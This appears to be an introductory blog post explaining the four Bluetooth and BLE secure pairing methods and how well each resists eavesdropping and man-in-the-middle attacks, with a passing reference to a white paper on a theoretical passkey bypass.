Bluetooth and Bluetooth Low Energy (BLE) devices are a part of our life today. Fitness trackers, smart speakers, toys, and a host of other products use these battery-efficient, good performance wireless protocols. One of the first steps in using any BT/BLE device is to “pair” it with a mobile phone (or another peripheral). Once “paired”, the devices can then simply “connect” the next time they’re in range or are triggered. A “connect” operation does not require re-pairing.

The Bluetooth Core Specifications allow for various options for devices to securely pair with each other. These mechanisms make it harder for rogue BT/BLE devices to perform “man-in-the-middle” attacks, hijack communication channels and corrupt/steal information in transit between the communicating devices.

The Bluetooth Core Specifications (since 2.1) define the following four security pairing mechanisms:

Just Works: This method requires no user interaction. It is typically used in devices which have no display and keypad. This method is susceptible to eavesdropping and Man In The Middle (MITM) attacks.

Numeric Comparison: This method has an additional step to the Just Works method. If both the devices have a display, a digit numeric key is shown on both the devices, which need to be checked by the user and confirmed. This method provides protection against MITM attacks.

Passkey: This method is suitable when one or both of the devices have a keypad to input a passkey. This passkey gets generated by one device and the user is required to enter it into another device, or the user may be required to enter the passkey in both the devices. The devices compares these input passkeys and authenticate each other. This method provides protection against MITM and eavesdropping. (There is a white paper Bypassing Passkey Authentication in Bluetooth Low Energy by Tomas Rosa describing a theoretical MITM attack without advanced knowledge of passkey).

Out of Band (OOB) Pairing: In this method, all the information and communication for authentication between devices happens using a different wireless technology such as NFC. This allows for protection against MITM attacks and eavesdropping, assuming that the OOB channel employs sufficient security methods. This, and the manual passkey methods offer the highest degree of secure pairing for BT/BLE devices.

After the passkey is shared and verified, a series of message exchanges are performed in order to derive various cryptographic keys and security parameters. We will go over the rest of the BT/BLE handshake in a separate post.